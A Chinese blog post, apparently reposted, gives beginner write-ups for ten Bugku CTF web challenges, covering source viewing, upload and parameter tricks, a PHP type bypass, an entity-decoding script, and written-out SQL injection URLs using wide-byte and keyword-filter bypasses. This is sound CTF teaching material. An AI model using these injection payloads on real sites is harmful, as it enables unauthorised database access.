bugkuctf_web_writeup(部分)--上

bugkuctf平台10个较简单的web题目writeup,适合新手入门,可以找来试试http://ctf.bugku.com/bbs 。

Web2

题目描述:

听说聪明的人都能找到答案

http://120.24.86.145:8002/web2/

直接查看源代码就可以找到flag

文件上传测试

题目描述:

http://103.238.227.13:10085/

Flag格式:Flag:xxxxxxxxxxxxx

抓包,改文件后缀和文件类型即可

计算题

题目描述:

地址:http://120.24.86.145:8002/yanzhengma/

F12修改长度限制即可(建议使用火狐浏览器,因为火狐弹框的内容是可以复制的)

web基础$_GET

题目描述:

http://120.24.86.145:8002/get/

代码审计

$what=$_GET['what'];

echo $what;

if($what=='flag')

echo 'flag{****}';

使用GET方式提交what=flag即可

http://120.24.86.145:8002/get/?what=flag

web基础$_POST

题目描述:

http://120.24.86.145:8002/post/

代码审计:

$what=$_POST['what'];

echo $what;

if($what=='flag')

echo 'flag{****}';

使用火狐的hackbar,POST方式提交what=flag

矛盾

题目描述: http://120.24.86.145:8002/get/index1.php

代码审计:

$num=$_GET['num'];

if(!is_numeric($num))

{

echo $num;

if($num==1)

echo 'flag{**********}';

}

index.php?num=1 在1后面添加任何除数字之外的字母或者符号即可绕过。

http://120.24.86.145:8002/get/index1.php?num=1a

Web3

题目描述:

flag就在这里快来找找吧

http://120.24.86.145:8002/web3/

网页界面一直在弹框,进制弹框后,查看源代码

发现:

<!--&#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&#104;&#74;&#75;&#45;&#72;&#83;&#49;&#49;&#73;&#73;&#73;&#125;-->

先用脚本转成字符试试

#-*-coding:utf-8-*-

strs = "&#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&#104;&#74;&#75;&#45;&#72;&#83;&#49;&#49;&#73;&#73;&#73;&#125"

res = strs.split(';')

key = ''

for i in res:

key += chr(int(i.replace('&#','')))

print key

运行结果为:KEY{xxxxxxxxxxxx}

Sql注入

题目描述:

http://103.238.227.13:10083/

格式KEY{}

试了一下可以进行宽字节注入

1. 先查库:http://103.238.227.13:10083/?id=1%df%27 union select 1,database()%23

2. 既然题目给了提示,直接查找sql5.key中id为1的string字段就好。

http://103.238.227.13:10083/?id=1%df%27 union select 1,string from sql5.key where id=1 %23

SQL注入1

题目描述: 地址:http://103.238.227.13:10087/

提示:过滤了关键字 你能绕过他吗

flag格式KEY{xxxxxxxxxxxxx}

题目给出了过滤代码,可以看到过滤了table、union、and、or、load_file、create、delete等关键词

经过测试,可在关键词中间加“<>”绕过,剩下的就跟上个题目一样了。

1. 查库:

http://103.238.227.13:10087/?id=1 un<>ion sel<>ect 1,database()%23

2. 查找表为key的数据表,id=1值hash字段值

http://103.238.227.13:10087/?id=1 un<>ion sel<>ect 1,hash fr<>om sql3.key where id=1%23

你必须让他停下

题目描述: 地址:http://120.24.86.145:8002/web12/

作者:@berTrAM

打开页面之后,一直在刷新

使用burp拦截,多go几下就出来flag了

原文发布于微信公众号 - 安恒网络空间安全讲武堂(gh_fa1e45032807)

原文发表时间:2018-03-20

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏上善若水

S009SEAndroid中定义的各种策略文件

在external/sepolicy目录 存放了很多SELinux的策略定义文件,在类似device/lge/mako/sepolicy目录下也放了策略文件,作...

1635
来自专栏别先生

基于jsp+servlet图书管理系统之后台用户信息修改操作

上一篇的博客写的是查询操作,且附有源码和数据库,这篇博客写的是修改操作,附有从头至尾写的代码(详细的注释)和数据库!  此次修改操作的源码和数据库:http:...

48610
来自专栏Python

Flask快速入门,知识整理

一、Flask介绍(轻量级的框架,非常快速的就能把程序搭建起来)   Flask是一个基于Python开发并且依赖jinja2模板和Werkzeug WSGI服...

4399
来自专栏大内老A

[WCF权限控制]从两个重要的概念谈起:Identity与Principal[上篇]

在安全领域,认证和授权是两个重要的主题。认证是安全体系的第一道屏障,守护着整个应用或者服务的第一道大门。当访问者叩门请求进入的时候,认证体系通过验证对方提供凭证...

2199
来自专栏安智客

GP TEE中的几种存储方式介绍

我们知道TEEOS最重要的功能莫过于安全存储了,这是一切安全的前提,根据存储安全性和使用场景GP TEE安全存储分为RPMB安全存储、SFS安全存储和SQLFS...

4626
来自专栏有趣的django

Django rest framework源码分析(1)----认证

一、基础 1.1.安装 两种方式: github pip直接安装 pip install django-rest-framework 1.2.需要先了解的一...

56711
来自专栏黑泽君的专栏

day59_BOS项目_11

第一步:创建一个流程实例管理ProcessInstanceAction,提供list()方法,查询流程实例列表数据

1213
来自专栏Python

使用python的email、smtplib、poplib模块收发邮件

https://blog.csdn.net/weixin_35955795/article/details/52881044

630
来自专栏小鄧子的技术博客专栏

【译】使用RxJava从多个数据源获取数据

试想,需要一些动态数据的时候,只要每次都请求网络就可以了。但是,更有效率的做法是,把联网得到的数据,缓存到磁盘或内存。

1742
来自专栏游戏杂谈

windows下node.js调用bat

如果指定了cwd,它会切换bat执行的目录,类似cd的功能,如果未指定默认为当前调用程序的目录。如果bat有输出错误,例如创建指定的文件/目录已经存在时,会返回...

2512

扫码关注云+社区

领取腾讯云代金券